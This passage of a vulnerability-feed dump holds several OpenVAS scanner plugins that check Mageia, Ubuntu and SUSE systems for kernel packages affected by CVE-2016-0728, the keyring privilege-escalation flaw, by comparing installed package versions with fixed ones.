Vulnerability Test\n# $Id: mgasa-2016-0033.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131197\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-01-25 07:27:45 +0200 (Mon, 25 Jan 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2016-0033\");\n script_tag(name:\"insight\", value:\"Perception Point Research Team found a reference leak in keyring in join_session_keyring() that can be exploited to successfully escalate privileges from a local user to root (CVE-2016-0728). Other fixes in this kernel update: - netfilter: nf_nat_redirect: add missing NULL pointer check\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2016-0033.html\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2016-0033\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.1.15~2.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kernel-userspace-headers\", rpm:\"kernel-userspace-headers~4.1.15~2.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-vboxadditions\", rpm:\"kmod-vboxadditions~5.0.12~2.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-virtualbox\", rpm:\"kmod-virtualbox~5.0.12~2.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-xtables-addons\", rpm:\"kmod-xtables-addons~2.7~8.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-broadcom-wl\", rpm:\"kmod-broadcom-wl~6.30.223.271~5.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-fglrx\", rpm:\"kmod-fglrx~15.200.1046~9.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-nvidia304\", rpm:\"kmod-nvidia304~304.128~5.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-nvidia340\", rpm:\"kmod-nvidia340~340.93~5.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-nvidia-current\", rpm:\"kmod-nvidia-current~346.96~5.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:27", "description": "The remote host is missing an update for 
the ", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-raspi2 USN-2872-3", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842611", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842611", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-raspi2 USN-2872-3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842611\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-20 06:16:48 +0100 (Wed, 20 Jan 2016)\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-raspi2 USN-2872-3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-raspi2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Yevgeny Pats discovered that the session\n keyring implementation in the Linux kernel did not properly reference count\n when joining an existing session keyring. 
A local attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary code with\n administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux-raspi2 on Ubuntu 15.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2872-3\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2872-3/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU15\\.10\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU15.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-1020-raspi2\", ver:\"4.2.0-1020.27\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:29", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-lts-utopic USN-2873-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842610", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842610", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-lts-utopic USN-2873-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 
Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842610\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-20 06:16:47 +0100 (Wed, 20 Jan 2016)\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-utopic USN-2873-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-utopic'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Yevgeny Pats discovered that the session\n keyring implementation in the Linux kernel did not properly reference count\n when joining an existing session keyring. 
A local attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary code\n with administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux-lts-utopic on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2873-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2873-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-59-generic\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-59-generic-lpae\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-59-lowlatency\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-59-powerpc-e500mc\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-59-powerpc-smp\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"linux-image-3.16.0-59-powerpc64-emb\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-59-powerpc64-smp\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:34:31", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-01-23T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for kernel (SUSE-SU-2016:0205-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851161", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851161", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851161\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-01-23 06:12:30 +0100 (Sat, 23 Jan 2016)\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for kernel (SUSE-SU-2016:0205-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The SUSE Linux Enterprise 12 kernel was updated to receive a security fix.\n\n The following security bug was fixed:\n\n - A reference leak in keyring handling with join_session_keyring() could\n lead to local attackers gain root privileges. 
(bsc#962075,\n CVE-2016-0728).\");\n\n script_tag(name:\"affected\", value:\"kernel on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"SUSE-SU\", value:\"2016:0205-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-extra\", rpm:\"kernel-default-extra~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-extra-debuginfo\", rpm:\"kernel-default-extra-debuginfo~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"SLES12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", 
rpm:\"kernel-default-devel~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base-debuginfo\", rpm:\"kernel-xen-base-debuginfo~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-man\", rpm:\"kernel-default-man~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:14", "description": "Mageia Linux Local Security Checks mgasa-2016-0031", "cvss3": {}, 
"published": "2016-01-25T00:00:00", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2016-0031", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2019-03-14T00:00:00&qu